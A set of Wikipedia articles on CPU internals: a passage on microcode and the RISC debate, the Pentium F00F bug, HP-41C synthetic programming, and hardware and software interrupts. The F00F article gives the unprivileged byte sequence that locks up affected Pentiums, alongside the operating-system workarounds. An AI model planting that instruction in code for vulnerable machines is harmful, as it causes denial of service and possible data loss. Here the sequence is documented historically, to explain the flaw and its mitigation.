control logic, but the cost of implementing a completely different decoder for each machine would be prohibitive. Using microcode meant all that changed was the code in the ROM. For instance, one machine might include afloating point unitand thus its microcode for multiplying two numbers might be only a few lines line, whereas on the same machine without the FPU this would be a program that did the same using multiple additions, and all that changed was the ROM.[16] The outcome of this design was that customers could use a low-end model of the family to develop their software, knowing that if more performance was ever needed, they could move to a faster version and nothing else would change. This lowered the barrier to entry and the 360 was a runaway success. By the end of the decade, the use of microcode wasde rigueuracross the mainframe industry. Earlyminicomputerswere far too simple to require microcode, and were more similar to earlier mainframes in terms of their instruction sets and the way they were decoded. But it was not long before their designers began using more powerfulintegrated circuitsthat allowed for more complex ISAs. By the mid-1970s, most new minicomputers andsuperminicomputerswere using microcode as well, such as most models of thePDP-11and, most notably, most models of theVAX, which included high-level instruction not unlike those found in the 360.[17] The same basic evolution occurred withmicroprocessorsas well. Early designs were extremely simple, and even the more powerful 8-bit designs of the mid-1970s like theZilog Z80had instruction sets that were simple enough to be implemented in dedicated logic. By this time, the control logic could be patterned into the same die as the CPU, making the difference in cost between ROM and logic less of an issue. However, it was not long before these companies were also facing the problem of introducing higher-performance designs but still wanting to offerbackward compatibility. Among early examples of microcode in micros was theIntel 8086.[6] Among the ultimate implementations of microcode in microprocessors is theMotorola 68000. This offered a highlyorthogonal instruction setwith a wide variety ofaddressing modes, all implemented in microcode. This did not come without cost, according to early articles, about 20% of the chip's surface area (and thus cost) is the microcode system[18]and[citation needed]of the systems 68,000 transistors were part of the microcode system. While companies continued to compete on the complexity of their instruction sets, and the use of microcode to implement these was unquestioned, in the mid-1970s an internal project in IBM was raising serious questions about the entire concept. As part of a project to develop a high-performance all-digitaltelephone switch, a team led byJohn Cockebegan examining huge volumes of performance data from their customer's 360 (andSystem/370) programs. This led them to notice a curious pattern: when the ISA presented multiple versions of an instruction, thecompileralmost always used the simplest one, instead of the one most directly representing the code. They learned that this was because those instructions were always implemented in hardware, and thus run the fastest. Using the other instruction might offer higher performance on some machines, but there was no way to know what machine they were running on. This defeated the purpose of using microcode in the first place, which was to hide these distinctions.[19] The team came to a radical conclusion: "Imposing microcode between a computer and its users imposes an expensive overhead in performing the most frequently executed instructions."[19] The result of this discovery was what is today known as theRISCconcept. The complex microcode engine and its associated ROM is reduced or eliminated completely, and those circuits instead dedicated to things like additional registers or a wider ALU, which increases the performance of every program. When complex sequences of instructions are needed, this is left to the compiler, which is the entire purpose of using a compiler in the first place. The basic concept was soon picked up by university researchers in California, where simulations suggested such designs would trivially outperform even the fastest conventional designs. It was one such project, at theUniversity of California, Berkeley, that introduced the term RISC. The industry responded to the concept of RISC with both confusion and hostility, including a famous dismissive article by the VAX team at Digital.[20]A major point of contention was that implementing the instructions outside of the processor meant it would spend much more time reading those instructions from memory, thereby slowing overall performance no matter how fast the CPU itself ran.[20]Proponents pointed out that simulations clearly showed the number of instructions was not much greater, especially when considering compiled code.[19] The debate raged until the first commercial RISC designs emerged in the second half of the 1980s, which easily outperformed the most complex designs from other companies. By the late 1980s it was over; even DEC was abandoning microcode for theirDEC Alphadesigns, and CISC processors switched to using hardwired circuitry, rather than microcode, to perform many functions. For example, theIntel 80486uses hardwired circuitry to fetch and decode instructions, using microcode only to execute instructions; register-register move and arithmetic instructions required only one microinstruction, allowing them to be completed in one clock cycle.[21]ThePentium Pro's fetch and decode hardware fetches instructions and decodes them into series of micro-operations that are passed on to the execution unit, which schedules and executes the micro-operations, possibly doing soout-of-order. Complex instructions are implemented by microcode that consists of predefined sequences of micro-operations.[22] Some processor designs use machine code that runs in a special mode, with special instructions, available only in that mode, that have access to processor-dependent hardware, to implement some low-level features of the instruction set. The DEC Alpha, a pure RISC design, usedPALcodeto implement features such astranslation lookaside buffer(TLB) miss handling and interrupt handling,[23]as well as providing, for Alpha-based systems runningOpenVMS, instructions requiring interlocked memory access that are similar to instructions provided by theVAXarchitecture.[23]CMOSIBM System/390CPUs, starting with the G4 processor, andz/ArchitectureCPUs usemillicodeto implement some instructions.[24] Each microinstruction in a microprogram provides the bits that control the functional elements that internally compose a CPU. The advantage over a hard-wired CPU is that internal CPU control becomes a specialized form of a computer program. Microcode thus transforms a complex electronic design challenge (the control of a CPU) into a less complex programming challenge. To take advantage of this, a CPU is divided into several parts: There may also be amemory address registerand amemory data register, used to access the maincomputer storage. Together, these elements form an "execution unit". Most modernCPUshave several execution units. Even simple computers usually have one unit to read and write memory, and another to execute user code. These elements could often be brought together as a single chip. This chip comes in a fixed width that would form a "slice" through the execution unit. These are known as "bit slice" chips. TheAMD Am2900family is one of the best known examples of bit slice elements.[39]The parts of the execution units and the whole execution units are interconnected by a bundle of wires called abus. Programmers develop microprograms, using basic software tools. Amicroassemblerallows a programmer to define the table of bits symbolically. Because of its close relationship to the underlying architecture, "microcode has several properties that make it difficult to generate using a compiler."[1]Asimulatorprogram is intended to execute the bits in the same way as the electronics, and allows much more freedom to debug the microprogram. After the microprogram is finalized, and extensively tested, it is sometimes used as the input to a computer program that constructs logic to produce the same data.[citation needed]This program is similar to those used to optimize aprogrammable logic array. Even without fully optimal logic, heuristically optimized logic can vastly reduce the number of transistors from the number needed for aread-only memory(ROM) control store. This reduces the cost to produce, and the electricity used by, a CPU. Microcode can be characterized ashorizontalorvertical, referring primarily to whether each microinstruction controls CPU elements with little or no decoding (horizontal microcode)[a]or requires extensive decoding bycombinatorial logicbefore doing so (vertical microcode). Consequently, each horizontal microinstruction is wider (contains more bits) and occupies more storage space than a vertical microinstruction. "Horizontal microcode has several discrete micro-operations that are combined in a single microinstruction for simultaneous operation."[1]Horizontal microcode is typically contained in a fairly wide control store; it is not uncommon for each word to be 108 bits or more. On each tick of a sequencer clock a microcode word is read, decoded, and used to control the functional elements that make up the CPU. In a typical implementation a horizontal microprogram word comprises fairly tightly defined groups of bits. For example, one simple arrangement might be: For this type of micromachine to implement a JUMP instruction with the address following the opcode, the microcode might require two clock ticks. The engineer designing it would write microassembler source code looking something like this: For each tick it is common to find that only some portions of the CPU are used, with the remaining groups of bits in the microinstruction being no-ops. With careful design of hardware and microcode, this property can be exploited to parallelise operations that use different areas of the CPU; for example, in the case above, the ALU is not required during the first tick, so it could potentially be used to complete an earlier arithmetic instruction. In vertical microcode, each microinstruction is significantly encoded, that is, the bit fields generally pass through intermediate combinatory logic that, in turn, generates the control and sequencing signals for internal CPU elements (ALU, registers, etc.). This is in contrast with horizontal microcode, in which the bit fields either directly produce the control and sequencing signals or are only minimally encoded. Consequently, vertical microcode requires smaller instruction lengths and less storage, but requires more time to decode, resulting in a slower CPU clock.[40] Some vertical microcode is just the assembly language of a simple conventional computer that is emulating a more complex computer. Some processors, such asDEC Alphaprocessors and the CMOS microprocessors on later IBM mainframesSystem/390andz/Architecture, use machine code, running in a special mode that gives it access to special instructions, special registers, and other hardware resources unavailable to regular machine code, to implement some instructions and other functions,[41][42]such as page table walks on Alpha processors.[43]This is calledPALcodeon Alpha processors andmillicodeon IBM mainframe processors. Another form of vertical microcode has two fields: Thefield selectselects which part of the CPU will be controlled by this word of the control store. Thefield valuecontrols that part of the CPU. With this type of microcode, a designer explicitly chooses to make a slower CPU to save money by reducing the unused bits in the control store; however, the reduced complexity may increase the CPU's clock frequency, which lessens the effect of an increased number of cycles per instruction. As transistors grew cheaper, horizontal microcode came to dominate the design of CPUs using microcode, with vertical microcode being used less often. When both vertical and horizontal microcode are used, the horizontal microcode may be referred to asnanocodeorpicocode.[44] A few computers were built usingwritable microcode. In this design, rather than storing the microcode in ROM or hard-wired logic, the microcode is stored in a RAM called awritable control storeorWCS. Such a computer is sometimes called awritable instruction set computer(WISC).[45] Many experimental prototype computers usewritable control stores; there are also commercial machines that use writable microcode, such as theBurroughs Small Systems, earlyXeroxworkstations, theDECVAX8800 (Nautilus) family, theSymbolicsL- and G-machines, a number of IBM System/360 andSystem/370implementations, some DECPDP-10machines,[46]and theData General Eclipse MV/8000.[47] The IBM System/370 includes a facility calledInitial-Microprogram Load(IMLorIMPL)[48]that can be invoked from the console, as part ofpower-on reset(POR) or from another processor in atightly coupledmultiprocessorcomplex. Some commercial machines, for example IBM 360/85,[49][50]have both a read-only storage and a writable control store for microcode. WCS offers several advantages including the ease of patching the microprogram and, for certain hardware generations, faster access than ROMs can provide. User-programmable WCS allows the user to optimize the machine for specific purposes. Starting with thePentium Proin 1995, severalx86CPUs have writableIntel Microcode.[51][52]This, for example, has allowed bugs in theIntel Core 2and IntelXeonmicrocodes to be fixed by patching their microprograms, rather than requiring the entire chips to be replaced. A second prominent example is the set of microcode patches that Intel offered for some of their processor architectures of up to 10 years in age, in a bid to counter the security vulnerabilities discovered in their designs –SpectreandMeltdown– which went public at the start of 2018.[53][54]A microcode update can be installed by Linux,[55]FreeBSD,[56]Microsoft Windows,[57]or the motherboard BIOS.[58] Some machines offer user-programmable writable control stores as an option, including theHP 2100, DECPDP-11/60,TI-990/12,[59][60]andVarian Data MachinesV-70 seriesminicomputers. The design trend toward heavily microcoded processors with complex instructions began in the early 1960s and continued until roughly the mid-1980s. At that point theRISCdesign philosophy started becoming more prominent. A CPU that uses microcode generally takes several clock cycles to execute a single instruction, one clock cycle for each step in the microprogram for that instruction. SomeCISCprocessors include instructions that can take a very long time to execute. Such variations interfere with bothinterrupt latencyand, what is far more important in modern systems,pipelining. When designing a new processor, ahardwired controlRISC has the following advantages over microcoded CISC: There are counterpoints as well: Many RISC andVLIWprocessors are designed to execute every instruction (as long as it is in the cache) in a single cycle. This is very similar to the way CPUs with microcode execute one microinstruction per cycle. VLIW processors have instructions that behave similarly to very wide horizontal microcode, although typically without such fine-grained control over the hardware as provided by microcode. RISC instructions are sometimes similar to the narrow vertical microcode. Microcode has been popular in application-specific processors such asnetwork processors,digital signal processors,channel controllers,disk controllers,network interface controllers,flash memory controllers,graphics processing units, and in other hardware. Modern CISC implementations, such as thex86family starting with theNexGenNx586, IntelPentium Pro, andAMD K5, decode instructions into dynamically bufferedmicro-operationswith an instruction encoding similar to RISC or traditional microcode. A hardwired instruction decode unit directly emits microoperations for common x86 instructions, but falls back to a more traditional microcode ROM containing microoperations for more complex or rarely used instructions.[2] For example, an x86 might look up microoperations from microcode to handle complex multistep operations such as loop or string instructions,floating-point unittranscendental functionsor unusual values such asdenormal numbers, and special-purpose instructions such asCPUID.
https://en.wikipedia.org/wiki/Microcode
ThePentium F00F bugis a design flaw in the majority ofIntelPentium,Pentium MMX, andPentium OverDriveprocessors(all in theP5 microarchitecture). Discovered in 1997, it can result in the processor ceasing to function until the computer is physically rebooted. Thebughas been circumvented throughoperating systemupdates. The name is shorthand forF0 0F C7 C8, thehexadecimalencoding of one offendinginstruction.[1]More formally, the bug is called theinvalid operand with locked CMPXCHG8B instruction bug.[2] In thex86 architecture, the byte sequenceF0 0F C7 C8represents the instructionlock cmpxchg8b eax(locked compare and exchange of 8 bytes in register EAX). The bug also applies to opcodes ending inC9throughCF, which specify registeroperandsother than EAX. TheF0 0F C7 C8instruction does not require anyspecial privileges. This instruction encoding is invalid. Thecmpxchg8binstruction compares the value in the EDX and EAXregisterswith an 8-bytevalue in a memory location. In this case, however, a register is specified instead of a memory location, which is not allowed. Under normal circumstances, this would simply result in anexception; however, when used with thelockprefix (normally used to prevent two processors from interfering with the same memory location), the CPU erroneously uses locked bus cycles to read the illegal instruction exception-handler descriptor. Locked reads must be paired with locked writes, and the CPU's bus interface enforces this by forbidding other memory accesses until the corresponding writes occur. As none are forthcoming, after performing these bus cycles all CPU activity stops, and the CPU must be reset to recover. Due to the proliferation of Intel microprocessors, the existence of this open-privilege instruction was considered a serious issue at the time.Operating systemvendors responded by implementingworkaroundsthat detected the condition and prevented the crash.[3]Information about the bug first appeared on the Internet on or around 8 November 1997.[4]Since the F00F bug has become common knowledge, the term is sometimes used to describe similar hardware design flaws such as theCyrix coma bug. No permanent hardware damage results from executing the F00F instruction on a vulnerable system; it simply locks up until rebooted. However,data lossof unsaved data is likely if thedisk buffershave not been flushed, if drives wereinterruptedduring a write operation, or if some other non-atomic operationwas interrupted. The B2steppingsolved this issue for Intel's Pentium processors.[2] The F00F instruction can be considered an example of aHalt and Catch Fire(HCF) instruction. Although a definite solution to this problem required some sort of hardware/firmware revision, there were proposed workarounds at the time[1]which prevented the exploitation of this issue in generating adenial-of-service attackon the affected machine. All of them were based on forcefully breaking up the pattern of faulty bus accesses responsible for the processor hang. Intel's proposed (therefore "official") solutions required setting up the table of interrupt descriptors in an unnatural way that forced the processor to issue an intervening page fault before it could access the memory containing the descriptor for the undefined-opcode exception. These extraneous memory accesses turned out to be sufficient for the bus interface to let go of the locking requirement that was the root cause for the bug. Specifically, the table of interrupt descriptors, which normally resides on a single memory page, is instead split over two pages such that the descriptors for the first seven exception handlers reside on a page, and the remainder of the table on the following page. The handler for the undefined opcode exception is then the last descriptor on the first page, while the handler for the page-fault exception resides on the second page. The first page can now be made not-present (usually signifying a page that has been swapped out to disk to make room for some other data), which will force the processor to fetch the descriptor for the page-fault exception handler. This descriptor, residing on the second page of the table, is present in memory as usual (if it were not, the processor woulddouble- and thentriple-fault, leading to a shutdown). These extra memory cycles override the memory locking requirement issued by the original illegal instruction (since faulting instructions are supposed to be able to be restarted after the exception handler returns). The handler for the page-fault exception has to be modified, however, to cope with the necessity of providing the missing page for the first half of the interrupt descriptor table, a task it is not usually required to perform. The second official workaround from Intel proposed keeping all pages present in memory, but marking the first page read-only. Since the originating illegal instruction was supposed to issue a memory write cycle, this is enough for again forcing the intervention of the page-fault handler. This variant has the advantage that the modifications required to the page-fault handler are very minor compared to the ones required for the first variant; it basically just needs to redirect to the undefined-exception handler when appropriate. However, this variant requires that the operating system itself be prevented from writing to read-only pages (through the setting of a global processor flag), and not all kernels are designed this way; more recent kernels in fact are, since this is the same basic mechanism used for implementingcopy-on-write. Additional workarounds other than the official ones from Intel have been proposed; in many cases these proved as effective and much easier to implement.[1]The simplest one involved merely marking the page containing interrupt descriptors as non-cacheable. Again, the extra memory cycles that the processor was forced to go through to fetch data from RAM every time it needed to invoke an exception handler appeared to be all that was needed to prevent the processor from locking up. In this case, no modification whatsoever to any exception handler was required. And, although not strictly necessary, the same split of the interrupt descriptor table was performed in this case, with only the first page marked non-cacheable. This was for performance reasons, as the page containing most of the descriptors (and the ones more often required, in fact) could stay in cache. For unknown reasons, these additional, unofficial workarounds were never endorsed by Intel. It might be that it was suspected that they might not work with all affected processor versions.
https://en.wikipedia.org/wiki/Pentium_F00F_bug
Synthetic programming(SP) is an advanced technique forprogrammingtheHP-41CandElektronika B3-34calculators, involving creatinginstructions(or combinations of instructions and operands) that cannot be obtained using the standard capabilities of the calculator.[1] Some HP-41C instructions are coded in memory usingmultiple bytes. Some of these sequence of bytes correspond to instructions the calculator is able to execute, but these cannot be entered in the program memory using conventional program entry methods (i.e.using the calculator as described in the user's manual).Synthetic programming uses abugin the calculator firmware to enter those byte sequences as a sequence of other instructions, then partially skipping halfway through the first instruction, so that the calculator believes the end of the first instruction is actually the beginning of a new one. This was calledbyte jumperorbyte grabber. It is not clear if the creators behind the HP-41 were aware of all these "black holes". HP did not officially support these techniques, but probably was intrigued by the strange operations and in some cases allowed enthusiasts to practice in their offices and helped to improve it among a whole sense of curiosity. Synthetic programming is also possible on the (original)HP-15C.[2][3] Thiscomputer-programming-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Synthetic_programming
Indigital computers, aninterrupt(sometimes referred to as atrap)[1]is a request for theprocessortointerruptcurrently executing code (when permitted), so that the event can be processed in a timely manner. If the request is accepted, the processor will suspend its current activities, save itsstate, and execute afunctioncalled aninterrupt handler(or aninterrupt service routine, ISR) to deal with the event. This interruption is often temporary, allowing the software to resume[a]normal activities after the interrupt handler finishes, although the interrupt could instead indicate a fatal error.[2] Interrupts are commonly used by hardware devices to indicate electronic or physical state changes that require time-sensitive attention. Interrupts are also commonly used to implementcomputer multitaskingandsystem calls, especially inreal-time computing. Systems that use interrupts in these ways are said to be interrupt-driven.[3] Hardware interrupts were introduced as an optimization, eliminating unproductive waiting time inpolling loops, waiting for external events. The first system to use this approach was theDYSEAC, completed in 1954, although earlier systems provided error trap functions.[4] TheUNIVAC 1103Acomputer is generally credited with the earliest use of interrupts in 1953.[5][6]Earlier, on theUNIVAC I(1951) "Arithmetic overflow either triggered the execution of a two-instruction fix-up routine at address 0, or, at the programmer's option, caused the computer to stop." TheIBM 650(1954) incorporated the first occurrence of interrupt masking. TheNational Bureau of StandardsDYSEAC(1954) was the first to use interrupts for I/O. TheIBM 704was the first to use interrupts fordebugging, with a "transfer trap", which could invoke a special routine when a branch instruction was encountered. The MITLincoln LaboratoryTX-2system (1957) was the first to provide multiple levels of priority interrupts.[6] Interrupt signals may be issued in response tohardwareorsoftwareevents. These are classified ashardware interruptsorsoftware interrupts, respectively. For any particular processor, the number of interrupt types is limited by the architecture. A hardware interrupt is a condition related to the state of the hardware that may be signaled by an external hardware device, e.g., aninterrupt request(IRQ) line on a PC, or detected by devices embedded in processor logic (e.g., the CPU timer in IBM System/370), to communicate that the device needs attention from theoperating system(OS)[7]or, if there is no OS, from thebare metalprogram running on the CPU. Such external devices may be part of the computer (e.g.,disk controller) or they may be externalperipherals. For example, pressing akeyboardkey or moving amouseplugged into aPS/2 porttriggers hardware interrupts that cause the processor to read the keystroke or mouse position. Hardware interrupts can arriveasynchronouslywith respect to the processor clock, and at any time during instruction execution. Consequently, all incoming hardware interrupt signals are conditioned by synchronizing them to the processor clock, and acted upon only at instruction execution boundaries. In many systems, each device is associated with a particular IRQ signal. This makes it possible to quickly determine which hardware device is requesting service, and to expedite servicing of that device. On some older systems, such as the 1964CDC 3600,[8]all interrupts went to the same location, and the OS used a specialized instruction to determine the highest-priority outstanding unmasked interrupt. On contemporary systems, there is generally a distinct interrupt routine for each type of interrupt (or for each interrupt source), often implemented as one or moreinterrupt vector tables. Tomaskan interrupt is to disable it, so it is deferred[b]or ignored[c]by the processor, while tounmaskan interrupt is to enable it.[9] Processors typically have an internalinterrupt maskregister,[d]which allows selective enabling[2](and disabling) of hardware interrupts. Each interrupt signal is associated with a bit in the mask register. On some systems, the interrupt is enabled when the bit is set, and disabled when the bit is clear. On others, the reverse is true, and a set bit disables the interrupt. When the interrupt is disabled, the associated interrupt signal may be ignored by the processor, or it may remain pending. Signals which are affected by the mask are calledmaskable interrupts. Some interrupt signals are not affected by the interrupt mask and therefore cannot be disabled; these are callednon-maskable interrupts(NMIs). These indicate high-priority events which cannot be ignored under any circumstances, such as the timeout signal from awatchdog timer. With regard toSPARC, the Non-Maskable Interrupt (NMI), despite having the highest priority among interrupts, can be prevented from occurring through the use of an interrupt mask.[10] One failure mode is when the hardware does not generate the expected interrupt for a change in state, causing the operating system to wait indefinitely. Depending on the details, the failure might affect only a single process or might have global impact. Some operating systems have code specifically to deal with this. As an example, IBMOperating System/360(OS/360) relies on a not-ready to ready device-end interrupt when a tape has been mounted on a tape drive, and will not read the tape label until that interrupt occurs or is simulated. IBM added code in OS/360 so that the VARY ONLINE command will simulate a device end interrupt on the target device. Aspurious interruptis a hardware interrupt for which no source can be found. The term "phantom interrupt" or "ghost interrupt" may also be used to describe this phenomenon. Spurious interrupts tend to be a problem with awired-ORinterrupt circuit attached to a level-sensitive processor input. Such interrupts may be difficult to identify when a system misbehaves. In a wired-OR circuit,parasitic capacitancecharging/discharging through the interrupt line's bias resistor will cause a small delay before the processor recognizes that the interrupt source has been cleared. If the interrupting device is cleared too late in the interrupt service routine (ISR), there will not be enough time for the interrupt circuit to return to the quiescent state before the current instance of the ISR terminates. The result is the processor will think another interrupt is pending, since the voltage at its interrupt request input will be not high or low enough to establish an unambiguous internal logic 1 or logic 0. The apparent interrupt will have no identifiable source, hence the "spurious" moniker. A spurious interrupt may also be the result of electricalanomaliesdue to faulty circuit design, highnoiselevels,crosstalk, timing issues, or more rarely,device errata.[11] A spurious interrupt may result in system deadlock or other undefined operation if the ISR does not account for the possibility of such an interrupt occurring. As spurious interrupts are mostly a problem with wired-OR interrupt circuits, good programming practice in such systems is for the ISR to check all interrupt sources for activity and take no action (other than possibly logging the event) if none of the sources is interrupting. A software interrupt is requested by the processor itself upon executing particular instructions or when certain conditions are met. Every software interrupt signal is associated with a particular interrupt handler. A software interrupt may be intentionally caused by executing a specialinstructionwhich, by design, invokes an interrupt when executed.[e]Such instructions function similarly tosubroutine callsand are used for a variety of purposes, such as requesting operating system services and interacting withdevice drivers(e.g., to read or write storage media). Software interrupts may also be triggered by program execution errors or by thevirtual memorysystem. Typically, the operating systemkernelwill catch and handle such interrupts. Some interrupts are handled transparently to the program - for example, the normal resolution of apage faultis to make the required page accessible in physical memory. But in other cases such as asegmentation faultthe operating system executes a process callback. OnUnix-likeoperating systemsthis involves sending asignalsuch asSIGSEGV,SIGBUS,SIGILLorSIGFPE, which may either call a signal handler or execute a default action (terminating the program). On Windows the callback is made usingStructured Exception Handlingwith an exception code such as STATUS_ACCESS_VIOLATION or STATUS_INTEGER_DIVIDE_BY_ZERO.[12] In a kernelprocess, it is often the case that some types of software interrupts are not supposed to happen. If they occur nonetheless, anoperating system crashmay result. The termsinterrupt,trap,exception,fault, andabortare used to distinguish types of interrupts, although "there is no clear consensus as to the exact meaning of these terms".[13]The termtrapmay refer to any interrupt, to any software interrupt, to any synchronous software interrupt, or only to interrupts caused by instructions withtrapin their names. In some usages, the termtraprefers specifically to abreakpointintended to initiate acontext switchto amonitor programordebugger.[1]It may also refer to a synchronous interrupt caused by an exceptional condition (e.g.,division by zero,invalid memory access,illegal opcode),[13]although the termexceptionis more common for this. x86divides interrupts into (hardware)interruptsand softwareexceptions, and identifies three types of exceptions: faults, traps, and aborts.[14][15](Hardware) interrupts are interrupts triggered asynchronously by an I/O device, and allow the program to be restarted with no loss of continuity.[14]A fault is restartable as well but is tied to the synchronous execution of an instruction - the return address points to the faulting instruction. A trap is similar to a fault except that the return address points to the instruction to be executed after the trapping instruction;[16]one prominent use is to implementsystem calls.[15]An abort is used for severe errors, such as hardware errors and illegal values in system tables, and often[f]does not allow a restart of the program.[16] Armuses the termexceptionto refer to all types of interrupts,[17]and divides exceptions into (hardware)interrupts,aborts,reset, and exception-generating instructions. Aborts correspond to x86 exceptions and may be prefetch aborts (failed instruction fetches) or data aborts (failed data accesses), and may be synchronous or asynchronous. Asynchronous aborts may be precise or imprecise. MMU aborts (page faults) are synchronous.[18] RISC-Vuses interrupt as the overall term as well as for the external subset; internal interrupts are called exceptions. Each interrupt signal input is designed to be triggered by either a logic signal level or a particular signal edge (level transition). Level-sensitive inputs continuously request processor service so long as a particular (high or low) logic level is applied to the input. Edge-sensitive inputs react to signal edges: a particular (rising or falling) edge will cause a service request to be latched; the processor resets the latch when the interrupt handler executes. Alevel-triggered interruptis requested by holding the interrupt signal at its particular (high or low) activelogic level. A device invokes a level-triggered interrupt by driving the signal to and holding it at the active level. It negates the signal when the processor commands it to do so, typically after the device has been serviced. The processor samples the interrupt input signal during each instruction cycle. The processor will recognize the interrupt request if the signal is asserted when sampling occurs. Level-triggered inputs allow multiple devices to share a common interrupt signal via wired-OR connections. The processor polls to determine which devices are requesting service. After servicing a device, the processor may again poll and, if necessary, service other devices before exiting the ISR.  As previously described, a processor whose level-sensitive interrupt input is connected to a wired-OR circuit is susceptible to spurious interrupts, which should they occur, may causedeadlockor some other potentially-fatal system fault. Anedge-triggered interruptis an interrupt signaled by alevel transitionon the interrupt line, either a falling edge (high to low) or a rising edge (low to high). A device wishing to signal an interrupt drives a pulse onto the line and then releases the line to its inactive state. The important part of edge triggering is that the signal must transition to trigger the interrupt; for example, if the transition was high-low, there would only be one falling edge interrupt triggered, and the continued low level would not trigger a further interrupt. The signal must return to the high level and fall again in order to trigger a further interrupt. This contrasts with a level trigger where the low level would continue to create interrupts (if they are enabled) until the signal returns to its high level. Computers with edge-triggered interrupts may include aninterrupt registerthat retains the status of pending interrupts. Systems with interrupt registers generally have interrupt mask registers as well. The processor samples the interrupt trigger signals or interrupt register during each instruction cycle, and will process the highest priority enabled interrupt found. Regardless of the triggering method, the processor will begin interrupt processing at the next instruction boundary following a detected trigger, thus ensuring: There are several different architectures for handling interrupts. In some, there is a single interrupt handler[19]that must scan for the highest priority enabled interrupt. In others, there are separate interrupt handlers for separate interrupt types,[20]separate I/O channels or devices, or both.[21][22]Several interrupt causes may have the same interrupt type and thus the same interrupt handler, requiring the interrupt handler to determine the cause.[20] Interrupts may be fully handled in hardware by the CPU, or may be handled by both the CPU and another component such as aprogrammable interrupt controlleror asouthbridge. If an additional component is used, that component would be connected between the interrupting device and the processor's interrupt pin tomultiplexseveral sources of interrupt onto the one or two CPU lines typically available. If implemented as part of thememory controller, interrupts are mapped into the system's memoryaddress space.[citation needed] Insystems on a chip(SoC) implementations, interrupts come from different blocks of the chip and are usually aggregated in an interrupt controller attached to one or several processors (in a multi-core system).[23] Multiple devices may share an edge-triggered interrupt line if they are designed to. The interrupt line must have a pull-down or pull-up resistor so that when not actively driven it settles to its inactive state, which is the default state of it. Devices signal an interrupt by briefly driving the line to its non-default state, and let the line float (do not actively drive it) when not signaling an interrupt. This type of connection is also referred to asopen collector. The line then carries all the pulses generated by all the devices. (This is analogous to thepull cordon some buses and trolleys that any passenger can pull to signal the driver that they are requesting a stop.) However, interrupt pulses from different devices may merge if they occur close in time. To avoid losing interrupts the CPU must trigger on the trailing edge of the pulse (e.g. the rising edge if the line is pulled up and driven low). After detecting an interrupt the CPU must check all the devices for service requirements. Edge-triggered interrupts do not suffer the problems that level-triggered interrupts have with sharing. Service of a low-priority device can be postponed arbitrarily, while interrupts from high-priority devices continue to be received and get serviced. If there is a device that the CPU does not know how to service, which may raise spurious interrupts, it will not interfere with interrupt signaling of other devices. However, it is easy for an edge-triggered interrupt to be missed - for example, when interrupts are masked for a period - and unless there is some type of hardware latch that records the event it is impossible to recover. This problem caused many "lockups" in early computer hardware because the processor did not know it was expected to do something. More modern hardware often has one or more interrupt status registers that latch interrupts requests; well-written edge-driven interrupt handling code can check these registers to ensure no events are missed. TheIndustry Standard Architecture(ISA) bus uses edge-triggered interrupts, without mandating that devices be able to share IRQ lines, but all mainstream ISA motherboards include pull-up resistors on their IRQ lines, so well-behaved ISA devices sharing IRQ lines should just work fine. Theparallel portalso uses edge-triggered interrupts. Many older devices assume that they have exclusive use of IRQ lines, making it electrically unsafe to share them. There are three ways multiple devices "sharing the same line" can be raised. First is by exclusive conduction (switching) or exclusive connection (to pins). Next is by bus (all connected to the same line listening): cards on a bus must know when they are to talk and not talk (i.e., the ISA bus). Talking can be triggered in two ways: by accumulation latch or by logic gates. Logic gates expect a continual data flow that is monitored for key signals. Accumulators only trigger when the remote side excites the gate beyond a threshold, thus no negotiated speed is required. Each has its speed versus distance advantages. A trigger, generally, is the method in which excitation is detected: rising edge, falling edge, threshold (oscilloscopecan trigger a wide variety of shapes and conditions). Triggering for software interrupts must be built into the software (both in OS and app). A 'C' app has a trigger table (a table of functions) in its header, which both the app and OS know of and use appropriately that is not related to hardware. However do not confuse this with hardware interrupts which signal the CPU (the CPU enacts software from a table of functions, similarly to software interrupts). Multiple devices sharing an interrupt line (of any triggering style) all act as spurious interrupt sources with respect to each other. With many devices on one line, the workload in servicing interrupts grows in proportion to the number of devices. It is therefore preferred to spread devices evenly across the available interrupt lines. Shortage of interrupt lines is a problem in older system designs where the interrupt lines are distinct physical conductors. Message-signaled interrupts, where the interrupt line is virtual, are favored in new system architectures (such asPCI Express) and relieve this problem to a considerable extent. Some devices with a poorly designed programming interface provide no way to determine whether they have requested service. They may lock up or otherwise misbehave if serviced when they do not want it. Such devices cannot tolerate spurious interrupts, and so also cannot tolerate sharing an interrupt line.ISAcards, due to often cheap design and construction, are notorious for this problem. Such devices are becoming much rarer, ashardware logicbecomes cheaper and new system architectures mandate shareable interrupts. Some systems use a hybrid of level-triggered and edge-triggered signaling. The hardware not only looks for an edge, but it also verifies that the interrupt signal stays active for a certain period of time. A common use of a hybrid interrupt is for the NMI (non-maskable interrupt) input. Because NMIs generally signal major – or even catastrophic – system events, a good implementation of this signal tries to ensure that the interrupt is valid by verifying that it remains active for a period of time. This 2-step approach helps to eliminate false interrupts from affecting the system. Amessage-signaled interruptdoes not use a physical interrupt line. Instead, a device signals its request for service by sending a short message over some communications medium, typically acomputer bus. The message might be of a type reserved for interrupts, or it might be of some pre-existing type such as a memory write. Message-signalled interrupts behave very much like edge-triggered interrupts, in that the interrupt is a momentary signal rather than a continuous condition. Interrupt-handling software treats the two in much the same manner. Typically, multiple pending message-signaled interrupts with the same message (the same virtual interrupt line) are allowed to merge, just as closely spaced edge-triggered interrupts can merge. Message-signalledinterrupt vectorscan be shared, to the extent that the underlying communication medium can be shared. No additional effort is required. Because the identity of the interrupt is indicated by a pattern of data bits, not requiring a separate physical conductor, many more distinct interrupts can be efficiently handled. This reduces the need for sharing. Interrupt messages can also be passed over a serial bus, not requiring any additional lines. PCI Express, a serial computer bus, usesmessage-signaled interruptsexclusively. In apush buttonanalogy applied tocomputer systems, the termdoorbellordoorbell interruptis often used to describe a mechanism whereby asoftwaresystem can signal or notify acomputer hardwaredevice that there is some work to be done. Typically, the software system will place data in some well-known and mutually agreed upon memory locations, and "ring the doorbell" by writing to a different memory location. This different memory location is often called the doorbell region, and there may even be multiple doorbells serving different purposes in this region. It is this act of writing to the doorbell region of memory that "rings the bell" and notifies the hardware device that the data are ready and waiting. The hardware device would now know that the data are valid and can be acted upon. It would typically write the data to ahard disk drive, or send them over anetwork, orencryptthem, etc. The termdoorbell interruptis usually amisnomer. It is similar to an interrupt, because it causes some work to be done by the device; however, the doorbell region is sometimes implemented as apolledregion, sometimes the doorbell region writes through to physical deviceregisters, and sometimes the doorbell region is hardwired directly to physical device registers. When either writing through or directly to physical device registers, this may cause a real interrupt to 